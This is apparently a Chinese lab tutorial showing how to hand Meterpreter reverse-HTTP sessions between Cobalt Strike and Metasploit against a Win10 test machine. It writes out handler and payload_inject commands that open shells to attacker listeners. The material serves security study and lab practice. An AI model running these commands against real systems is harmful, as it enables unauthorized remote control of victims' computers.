Cs与msf互传shell

Cs的shell反弹到msf

首先咋们需要准备两台kali,一台win10靶机

kali1 ip:192.168.5.129

kali2 ip:192.168.5.161

win10 ip:192.168.5.165

咋们利用kali1打开cs,利用kali2打开msf进行联动;

在cs上建立一个监听,名字随便起,这里我起名为test,ip输入kali1的;

生成一段payload,并在win10靶机上线(在win10点击生成的payload即可)

然后在kali2启动msf,使用监听模块

命令:

msfconsole        //进入msf控制台

use exploit/multi/handler    //进入监听模块

set payload windows/meterpreter/reverse_http   //设置http协议

set lhost 192.168.5.161        //kali2的ip

set lport 2222

run

在添加一个监听器和msf一样就行了

这时候需要把码主动的发给msf,所以选择foreign http

对了,要右键把回连间隔设置成0,不然太慢了

接下来我们把我们的这个shell发送给msf,

命令:执行choose

          或者直接spawn msf

成功获取权限

msf传shell给cs

首先,msf获得win10的权限,具体操作:msfconsole之制作windows木马并成功获取shell(反向payload)-CSDN博客

先在 cs 开启监听,Cobalt Strike->Listeners-Add,Name 随便填,Host 填写服务端 ip,Port 填写服务端设置的端口

首先msf中已有会话session 1

use exploit/windows/local/payload_inject

set payload windows/meterpreter/reverse_http   #两边的payload协议一定要对应的

set DisablePayloadHandler true   #默认情况下,payload_inject执行之后会在本地产生一个新的handler,由于已经有了一个不需要再产生一个,所以这里设置为true

set lhost 192.168.5.129                #cobaltstrike服务端ip

set lport 4444                #cobaltstrike服务端监听的端口

set session 1                    #这里是当前获得的session的id

run

可以看到 cs 成功接收到 shell

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值